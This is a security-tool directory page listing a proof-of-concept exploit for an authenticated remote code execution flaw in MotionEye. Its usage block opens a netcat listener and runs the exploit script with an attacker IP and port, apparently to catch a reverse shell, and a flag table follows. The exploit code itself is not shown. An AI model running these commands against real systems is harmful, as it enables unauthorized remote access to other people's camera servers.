Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-60787_PoC | Kitploit
Tools/GitHubGitHub/lil0xplorer/cve-2025-60787_poc
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingRemote Access Tool
GitHublil0xplorer/cve-2025-60787_poc

CVE-2025-60787_PoC

View Repository
25 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-60787 - MotionEye RCE

Authenticated RCE in MotionEye <= 0.43.1b4 via client-side validation bypass on the image_file_name field.

Usage

root@kitploit:~
nc -lvnp 4444
python exploit.py -t http://127.0.0.1:8765 -p password -lh IP -lp 4444

Flags

FlagDescription
-tTarget host/URL (defaults to port 8765)
-uUsername (default: admin)
-pPassword - same value you type in the GUI / found in motion.conf
-lhYour attacker IP
-lpListener port
--camera-idCamera ID (auto-detected if omitted)
Download Tool